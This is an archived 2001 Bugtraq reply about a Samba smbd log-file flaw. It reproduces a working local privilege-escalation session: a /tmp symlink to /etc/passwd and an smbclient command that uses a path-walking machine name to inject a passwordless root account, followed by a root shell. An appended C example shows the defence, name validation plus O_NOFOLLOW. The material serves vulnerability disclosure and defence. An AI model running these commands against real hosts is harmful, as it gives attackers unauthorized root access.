[21188] in bugtraq


Re: smbd remote file creation vulnerability

daemon@ATHENA.MIT.EDU (Pavol Luptak)
Mon Jun 25 18:26:39 2001

Date: Mon, 25 Jun 2001 19:09:19 +0200
From: Pavol Luptak <wilder@hq.alert.sk>
To: bugtraq@securityfocus.com
Message-ID: <20010625190919.A13420@hq.alert.sk>
Mail-Followup-To: Pavol Luptak <wilder@hq.alert.sk>,
	bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="HlL+5n6rz5pIUxbD"
Content-Disposition: inline
In-Reply-To: <20010625001401.A2738@localhost.sk>; from maniac@localhost.sk on Mon, Jun 25, 2001 at 12:14:02AM +0200


On Mon, Jun 25, 2001 at 12:14:02AM +0200, maniac@localhost.sk wrote:
> 
> Hi,
> 
> Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) by default logs here:
> /var/log/samba/log.%m
> 
> I replaced it with /var/log/samba/%m.log and used your exploit, which
> worked - this line was also appended to /etc/passwd:
>   toor::0:0::/:/bin/sh
> 
> But because there were those two spaces at the beginning of the line, it was
> impossible to su to that account; this is the error message:
> 
> Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown
> 
> I tried to insert \r after the first \n, but unsuccessfully.
> I'm using pam-0.72-7mdk.
> 
> These versions of PAM also don't permit spaces at the beginning of a line:
> pam-0.72-20.6.x (Redhat6.2)
> pam-0.74-6mdk (Mandrake8.0)
> 
> Maybe sshd without PAM support and permitting empty password may be
> 'vulnerable' on such systems.

[wilder@lysurus wilder]$ cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586
[wilder@lysurus wilder]$ rpm -q pam
pam-0.74-6mdk
[wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf
# this tells Samba to use a separate log file for each machine
   log file = /var/log/samba/%m.log  	 (= changed from default log.%m)
# Put a capping on the size of the log files (in Kb).
[wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd
samba-2.0.9-1.3mdk
[wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
[wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0
Anonymous login successful
Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
[wilder@lysurus wilder]$ tail /etc/passwd
..
..
[2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
  Rejecting user 'wilder': authentication failed
[2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
  ../../../tmp/x (127.0.0.1) couldn't find service 
  toor::0:0::/:/bin/sh
[wilder@lysurus wilder]$ su toor
[root@lysurus wilder]#

Appending to /etc/passwd has nothing to do with pam.

Mandrake security fix of samba-2.0.9-1.3mdk does not solve this security
problem. This exploit works with samba 2.0.8 without problems, too.

Linux kernels with openwall patch (with restricted links in /tmp) are
immune to this type of attack (following symlinks does not work, link
owner does not match with file's owner).

Cheers,

Pavol
-- 
_______________________________________________________________________
[wilder@hq.alert.sk] [http://hq.alert.sk/~wilder] [talker: ttt.sk 5678]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7N3A/hL+8XxdK5TIRAqw0AKClDu7mLsRDd1WqP1xy5QsL2iMPUwCglNb8
C76JzoWb5djJrCG6h2atdfc=
=AyqG
-----END PGP SIGNATURE-----
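The session above relies on two server-side weaknesses: the peer-supplied machine name (%m) is pasted into a log path without being checked, so "../../../tmp/x" escapes the log directory, and the resulting file is opened through a symlink, so the write lands in /etc/passwd. The following C program is an added example written for this archive page; it is not Samba's code and not part of the post. It shows the two checks a daemon that names per-client log files should make: accept only a plain hostname token for the client name, and open the log with O_NOFOLLOW so a planted symlink is refused. All directory and file names it uses are constructed inside a private temporary directory.

```c
/* Added example (not Samba code): hardened per-client log-file open.
 * Defends against a path-walking client name and a symlink at the log path. */
#define _GNU_SOURCE
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* %m comes straight from the peer: accept only a plain hostname token.
 * Rejects '/', '.', spaces and newlines, so neither "../../../tmp/x"
 * nor a name carrying an injected passwd line gets through. */
int safe_machine_name(const char *m)
{
    if (m == NULL || *m == '\0' || strlen(m) > 63)
        return 0;
    for (const char *p = m; *p; p++)
        if (!isalnum((unsigned char)*p) && *p != '-' && *p != '_')
            return 0;
    return 1;
}

/* Open <dir>/<machine>.log for append. O_NOFOLLOW makes open() fail (ELOOP
 * on Linux) when the final component is a symlink, so "ln -s /etc/passwd
 * /tmp/x.log" yields no descriptor. Returns the fd, or -1 with errno set. */
int open_client_log(const char *dir, const char *machine)
{
    char path[PATH_MAX];
    if (!safe_machine_name(machine)) {
        errno = EINVAL;
        return -1;
    }
    if (snprintf(path, sizeof path, "%s/%s.log", dir, machine) >= (int)sizeof path) {
        errno = ENAMETOOLONG;
        return -1;
    }
    return open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
}

/* Replays the symlink trick from the post inside a constructed temp dir:
 * a stand-in "passwd" file is the symlink target of x.log. Returns 1 if
 * the hardened open refused the symlink and the target stayed empty. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/logdemo.XXXXXX";           /* constructed sandbox */
    char target[PATH_MAX], lnk[PATH_MAX];
    struct stat st;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/passwd", dir);
    snprintf(lnk, sizeof lnk, "%s/x.log", dir);
    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t < 0)
        return 0;
    close(t);
    if (symlink(target, lnk) != 0)
        return 0;

    int fd = open_client_log(dir, "x");
    int refused = (fd < 0);
    if (fd >= 0)
        close(fd);
    int untouched = (stat(target, &st) == 0 && st.st_size == 0);

    unlink(lnk);
    unlink(target);
    rmdir(dir);
    return refused && untouched;
}

/* The legitimate path still works: a plain hostname gets its own log file
 * and a line can be appended to it. Returns 1 on success. */
int demo_plain_name_ok(void)
{
    char dir[] = "/tmp/logdemo.XXXXXX";           /* constructed sandbox */
    char path[PATH_MAX];
    if (mkdtemp(dir) == NULL)
        return 0;
    int fd = open_client_log(dir, "ws01");
    int ok = (fd >= 0 && write(fd, "connect from ws01\n", 18) == 18);
    if (fd >= 0)
        close(fd);
    snprintf(path, sizeof path, "%s/ws01.log", dir);
    unlink(path);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("path-walking name rejected: %d\n", !safe_machine_name("../../../tmp/x"));
    printf("symlink refused: %d\n", demo_symlink_refused());
    printf("plain name ok: %d\n", demo_plain_name_ok());
    return 0;
}
```

The name check is the stronger of the two defences because it also stops the traversal before any filesystem call is made; O_NOFOLLOW covers the case where the log directory itself is writable by others, which is the condition the Openwall restricted-links patch mentioned in the reply addresses at the kernel level.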
